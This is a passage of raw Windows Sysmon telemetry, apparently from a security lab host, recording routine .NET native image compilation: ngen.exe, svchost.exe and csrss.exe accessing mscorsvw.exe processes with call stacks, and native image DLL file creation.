13:25:29.180{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4649-6000-AD03-000000009A01}2992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007889Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.118{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4649-6000-AC03-000000009A01}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007888Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.102{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4649-6000-AC03-000000009A01}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007887Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.102{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4649-6000-AC03-000000009A01}4624C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007886Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.055{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4649-6000-AB03-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007885Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.039{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4649-6000-AB03-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007884Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:29.039{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4649-6000-AB03-000000009A01}5088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007916Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.977{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464A-6000-B403-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007915Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.961{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464A-6000-B403-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007914Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.961{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464A-6000-B403-000000009A01}1360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.915{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464A-6000-B303-000000009A01}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.899{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-464A-6000-B303-000000009A01}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.899{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464A-6000-B303-000000009A01}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.805{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464A-6000-B203-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.790{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-464A-6000-B203-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.790{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464A-6000-B203-000000009A01}856C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.727{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-464A-6000-B103-000000009A01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.711{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-464A-6000-B103-000000009A01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.711{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464A-6000-B103-000000009A01}4808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:30.618{08A6967A-4649-6000-B003-000000009A01}2316C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\90c-0\Microsoft.CSharp.dll2021-01-14 13:25:30.618 10341000x80000000000000007903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.602{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4287-6000-0C00-000000009A01}588C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:30.602{08A6967A-4288-6000-0D00-000000009A01}6122720C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007925Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.977{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-464B-6000-B703-000000009A01}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007924Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:25:31.977{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-464B-6000-B703-000000009A01}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007923Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:25:31.899{08A6967A-464B-6000-B603-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1288-0\Microsoft.Internal.Tasks.Dataflow.dll2021-01-14 13:25:31.899 10341000x80000000000000007922Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 